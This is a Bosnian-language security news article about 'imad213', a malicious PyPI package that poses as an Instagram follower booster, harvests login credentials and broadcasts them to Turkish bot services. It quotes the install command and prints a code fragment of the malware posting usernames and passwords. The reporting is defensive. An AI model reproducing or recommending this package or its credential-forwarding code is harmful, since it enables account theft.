Pojavila se sofisticirana kampanja malicioznog softvera zasnovana na Pythonu koja cilja korisnike Instagrama očajne za rastom broja pratilaca na društvenim mrežama, maskirajući se kao legitimni alat za povećanje broja pratilaca dok tajno prikuplja pristupne podatke.
Maliciozni PyPI paket, identifikovan kao “imad213”, profesionalno se predstavlja na GitHubu s detaljnom dokumentacijom koja reklamira funkcije za poboljšanje Instagrama, uvjeravajući ništa ne sluteće korisnike da preuzmu ono što vjeruju da je prava usluga za rast.
Maliciozni softver koristi napredne taktike društvenog inženjeringa , uz profesionalno brendiranje i upute za instalaciju koje odražavaju legitimne softverske pakete.
Korisnicima se daje instrukcija da jednostavno pokrenu “pip install imad213” nakon čega slijedi naredba “imad213” kako bi počeli povećavati broj svojih pratilaca.
.webp)
Analitičari Socket.dev-a identifikovali su ovaj program za prikupljanje podataka kao dio šireg skupa alata za napad koji je kreirao napadač “IMAD-213”, koji djeluje pod email adresom [email protected] i održava više malicioznih alata usmjerenih na različite platforme.
Vektor napada pokazao se posebno opasnim jer iskorištava želju korisnika za potvrdom na društvenim mrežama, psihološku ranjivost koja žrtve čini sklonijima ignorisanju sigurnosnih upozorenja.
Nakon izvršenja, alat prikazuje uvjerljiv brend „INSTA-FOLLOWERS“ koji pojačava očekivanja korisnika, čineći ih ugodnim za unos svojih stvarnih Instagram podataka.
Maliciozni softver implementira daljinski kill switch putem kontrolne datoteke hostovane na Netlifyju, omogućavajući napadaču da održi operativnu kontrolu nad svim raspoređenim instancama širom svijeta.
Obim ove kampanje proteže se dalje od krađe pojedinačnih podataka, jer kompromitovani računi se suočavaju s trenutnim kršenjem pravila prema Uslovima korištenja Instagrama, što potencijalno rezultuje suspenzijom ili trajnim ukidanjem računa.
S obzirom na to da Instagram ima 2 milijarde aktivnih mjesečnih korisnika koji predstavljaju glavnu metu, algoritam platforme zasnovan na angažmanu stvorio je unosno tržište za legitimne i maliciozne usluge rasta.
Mreža za emitovanje akreditiva: Skrivena opasnost
Najalarmantniji aspekt ovog malicioznog softvera leži u njegovom mehanizmu distribucije akreditiva, koji istovremeno emituje ukradene podatke za prijavu na deset različitih turskih bot servisa.
Nakon prikupljanja korisničkih imena i lozinki za Instagram putem obmanjujućeg interfejsa, zlonamjerni softver izvršava sljedeću strukturu koda: –
login_data = {
"username": username,
"password": password,
"userid": "",
"antiForgeryToken": "5e65770c2420a986097445ab74b0e24b"
}
response = session. Post(login_url, headers=headers, data=login_data).webp)
Ovo emitovanje akreditacije cilja na servise uključujući takipcimx.net, takipcizen.com i bigtakip.net, koji su svi registrovani preko iste turske telekomunikacijske kompanije u roku od nekoliko dana u junu 2021. godine.
Koordinirana infrastruktura sugerira sofisticiranu, dugoročnu operaciju, a ne oportunističke napade, pri čemu se svi domeni aktivno održavaju i nedavno ažuriraju uprkos tome što su operativni već skoro četiri godine.
Izvor: CyberSecurityNews
